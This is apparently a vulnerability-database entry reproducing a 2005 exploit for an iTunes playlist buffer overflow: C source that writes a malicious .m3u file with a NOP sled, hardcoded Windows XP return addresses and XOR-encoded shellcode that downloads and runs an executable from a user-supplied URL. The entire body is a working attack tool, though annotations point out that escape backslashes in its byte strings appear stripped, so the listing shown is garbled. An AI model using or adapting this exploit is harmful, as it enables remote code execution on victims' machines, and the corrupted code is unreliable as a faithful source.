Apple iTunes – Playlist Buffer Overflow Download Shellcode
漏洞ID | 1054861 | 漏洞类型 | |
发布时间 | 2005-01-16 | 更新时间 | 2005-01-16 |
CVE编号 | N/A |
CNNVD-ID | N/A |
漏洞平台 | Windows | CVSS评分 | N/A |
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
/*
*
* Apple iTunes Playlist Buffer Overflow Download Shellcoded Exploit
* Bug discovered by iDEFENSE Security (http://www.idefense.com)
* Exploit coded By ATmaCA
* Copyright ©2002-2005 AtmacaSoft Inc. All Rights Reserved.
* Web: http://www.atmacasoft.com
* E-Mail: [email protected]
* Credit to xT and delikon
* Usage:exploit <Target> <OutputPath> <Url>
* Targets:
* 1 - WinXP SP1 english - kernel32.dll push eax - ret [0x77E6532A]
* 2 - WinXP SP2 english - kernel32.dll push eax - ret [0x7C80BCB0]
* Example:exploit 1 vuln.m3u http://www.atmacasoft.com/exp/msg.exe
*
*/
/*
*
* iTunes versions up to and including 4.7 are affected
* Tested with iTunes v4.7 on WinXp Sp2 english platform
*
*/
#include <stdio.h>
#include <stdlib.h>
#include <conio.h>
#include <string.h>
#ifdef __BORLANDC__
#include <mem.h>
#endif
#define NOP 0x90   /* x86 single-byte no-op; used as filler in the generated file */
/* (*.m3u) playlist header: the generated file is a single "http://" entry */
char m3u_playlist_header[] = "http://";
/* Generic win32 http download shellcode
xored with 0x1d by delikon (http://delikon.de/) */
/* NOTE(review): in this copy the backslashes of the \x escapes appear to have
   been stripped, so every "xEB" is three ASCII characters rather than one
   byte; the same applies to the target[] entries and to the "x22xff" /
   "x1d" literals in main().  The listing is therefore not a faithful
   reproduction of the original source. */
char shellcode[] = "xEB"
"x10x58x31xC9x66x81xE9x22xFFx80x30x1Dx40xE2xFAxEBx05xE8xEBxFF"
"xFFxFFxF4xD1x1Dx1Dx1Dx42xF5x4Bx1Dx1Dx1Dx94xDEx4Dx75x93x53x13"
"xF1xF5x7Dx1Dx1Dx1Dx2CxD4x7BxA4x72x73x4Cx75x68x6Fx71x70x49xE2"
"xCDx4Dx75x2Bx07x32x6DxF5x5Bx1Dx1Dx1Dx2CxD4x4Cx4Cx90x2Ax4Bx90"
"x6Ax15x4Bx4CxE2xCDx4Ex75x85xE3x97x13xF5x30x1Dx1Dx1Dx4Cx4AxE2"
"xCDx2CxD4x54xFFxE3x4Ex75x63xC5xFFx6ExF5x04x1Dx1Dx1DxE2xCDx48"
"x4Bx79xBCx2Dx1Dx1Dx1Dx96x5Dx11x96x6Dx01xB0x96x75x15x94xF5x43"
"x40xDEx4Ex48x4Bx4Ax96x71x39x05x96x58x21x96x49x18x65x1CxF7x96"
"x57x05x96x47x3Dx1CxF6xFEx28x54x96x29x96x1CxF3x2CxE2xE1x2CxDD"
"xB1x25xFDx69x1AxDCxD2x10x1CxDAxF6xEFx26x61x39x09x68xFCx96x47"
"x39x1CxF6x7Bx96x11x56x96x47x01x1CxF6x96x19x96x1CxF5xF4x1Fx1D"
"x1Dx1Dx2CxDDx94xF7x42x43x40x46xDExF5x32xE2xE2xE2x70x75x75x33"
"x78x65x78x1D";
/* Return-address table, one entry per supported target; main() indexes it
   with atoi(argv[1]) - 1 and writes the entry with fprintf("%s"), so each
   entry is treated as a C string.  Little-endian byte order of the
   addresses listed in the header comment. */
char *target[]= //return addr - EIP
{
"x2Ax53xE6x77", //push eax - kernel32.dll - WinXP Sp1 english
"xB0xBCx80x7C" //push eax - kernel32.dll - WinXP Sp2 english
};
/* File-scope state shared between main() and Sifrele(). */
FILE *di;               /* output playlist file (argv[2]), opened "wb" */
int targetnum;          /* 0-based index into target[] */
int i = 0;              /* loop index shared by main() and Sifrele() */
short int weblength;    /* 2-byte length field patched into shellcode */
char *web;              /* URL taken from argv[3]; encoded in place by Sifrele() */
char *pointer = NULL;   /* position of the length marker inside shellcode */
char *newshellcode;     /* shellcode + encoded URL, heap-allocated, never freed */
/*xor cryptor*/
/* XOR "cryptor": flips every byte of the NUL-terminated string Name1 with
   the constant 0x1d, in place, and returns the same pointer.  Applying it
   twice restores the input.  Like the rest of the file it uses the
   file-scope index `i`, which equals the string length on return. */
char *Sifrele(char *Name1)
{
const char key = 0x1d;
const int len = (int)strlen(Name1);
for (i = 0; i < len; i++) {
Name1[i] ^= key;
}
return Name1;
}
/* Entry point: exploit <Target> <OutputPath> <Url>.
   Writes a .m3u file to argv[2] consisting of the "http://" header, 3045
   NOP bytes, the 4-byte entry of target[] selected by argv[1], 50 more
   NOPs, then the shellcode with a length field patched in and the
   XOR-encoded URL (argv[3]) appended (see the in-line comments; the layout
   is the original author's and is reproduced here as found).
   Non-standard: `void main` and the C++ `new char[]` on the allocation
   line mean this only builds as C++ (cf. the __BORLANDC__ include above).
   Review note: the output file is easy to recognise — an "http://" entry
   followed by a long run of 0x90 bytes — which is useful for detection
   signatures on playlist files.  Also note that the escape backslashes in
   the string literals appear to have been stripped in this copy. */
void main(int argc, char *argv[])
{
/* usage banner when fewer than three arguments were supplied */
if (argc < 4)
{
printf("Apple iTunes Playlist Buffer Overflow Download Shellcoded Exploitn");
printf("Bug discoveried by iDEFENSE Security (http://www.idefense.com)n");
printf("Exploit coded By ATmaCAn");
printf("Copyright ©2002-2005 AtmacaSoft Inc. All Rights Reserved.n");
printf("Web: http://www.atmacasoft.comn");
printf("E-Mail: [email protected]");
printf("Credit to xT and delikonnn");
printf("tUsage:exploit <Target> <OutputPath> <Url>n");
printf("tTargets:n");
printf("t1 - WinXP SP1 english - kernel32.dll push eax - ret [0x77E6532A]n");
printf("t2 - WinXP SP2 english - kernel32.dll push eax - ret [0x7C80BCB0]n");
printf("tExample:exploit 1 vuln.m3u http://www.atmacasoft.com/exp/msg.exen");
return;
}
/* argv[1] is 1-based for the user; target[] is 0-based.  No range check
   is performed on the result. */
targetnum = atoi(argv[1]) - 1;
web = argv[3];
/* binary mode so no newline translation happens on Windows */
if( (di=fopen(argv[2],"wb")) == NULL )
{
printf("Error opening file!n");
return;
}
/* playlist header, without its terminating NUL */
for(i=0;i<sizeof(m3u_playlist_header)-1;i++)
fputc(m3u_playlist_header[i],di);
/*stuff in a couple of NOPs*/
for(i=0;i<3045;i++)
fputc(NOP,di);
/*Overwriting the return address (EIP) with push eax address*/
/*located somewhere in process space*/
/* written with "%s", so the entry is copied only up to its first NUL byte */
fprintf(di,"%s",target[targetnum]); // - ret
for(i=0;i<50;i++) //NOPs
fputc(NOP,di);
/* Patch the 2-byte length field inside shellcode: locate the marker with
   strstr() and overwrite it in place with a value derived from the URL
   length.  `pointer` is not checked for NULL before the memcpy(). */
weblength=(short int)0xff22;
pointer=strstr(shellcode,"x22xff");
weblength-=strlen(web)+1;
memcpy(pointer,&weblength,2);
/* C++ allocation (no matching delete[]); holds shellcode + encoded URL +
   trailing terminator byte */
newshellcode = new char[sizeof(shellcode)+strlen(web)+1];
strcpy(newshellcode,shellcode);
/* Sifrele() XORs argv[3] in place with 0x1d and returns the same pointer */
strcat(newshellcode,Sifrele(web));
strcat(newshellcode,"x1d");
/* strlen() stops at the first NUL in the combined buffer */
for(i=0;i<strlen(newshellcode);i++)
fputc(newshellcode[i],di);
//for(i=0;i<50;i++) //NOPs
//fputc(NOP,di);
printf("Vulnarable m3u file %s has been generated!n",argv[2]);
fclose(di);
}
// milw0rm.com [2005-01-16]